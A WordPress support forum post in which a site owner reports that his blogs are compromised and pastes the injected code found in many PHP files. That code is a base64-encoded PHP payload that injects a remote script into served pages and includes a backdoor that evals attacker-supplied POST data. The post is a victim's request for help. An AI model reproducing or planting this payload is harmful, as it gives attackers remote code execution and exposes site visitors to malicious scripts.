• I have two blogs that over the last week have been showing …

    Fatal error: Cannot redeclare x9le4() (previously declared in /home/milest/public_html/milest/index.php(1) : eval()’d code:1) in /home/milest/public_html/milest/wp-settings.php(1) : eval()’d code on line 1

    … or something similar after fresh installs of updated wordpress files, fresh, safe themes, fresh databases and no plugins.

    My webhost installed a php.ini file …

    register_globals = Off

    … which was suppose to keep the .php files from being written to (oh well).

    Also i relocated the wp-config.php file to my server root in an attempt to keep it more secure and hidden, that was hacked as well.

    The ‘hack’ is a loonng line of gibberish at the head of all .php files, or at least a lot of them….

    <?php eval(base64_decode(‘aWYoIWlzc2V0KCR4OWxlNDEpKXtmdW5jdGlvbiB4OWxlNCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJSbGNtRmphMlYwWldWeWN5NXViQzl0WVcxaWIzUnpMMmgwWVdOalpYTnpMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24geDlsZTQyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHg5bGU0MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkeDlsZTQxKSljYWxsX3VzZXJfZnVuYygkeDlsZTQxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3g5bGU0JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3g5bGU0Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHg5bGU0bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigneDlsZTQyJykpIT0neDlsZTQyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=’)); ?>

    … notice the “base64 decode” up top. I’ve not seen any strange URLs on the blog(s) and non of my comments or permalinks have been changed.

    I’m running the very latest version of WP (8.5?).

    Any thoughts? This is making me crazy.

    Thanks!
    Miles

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Hacked! Ugh.’ is closed to new replies.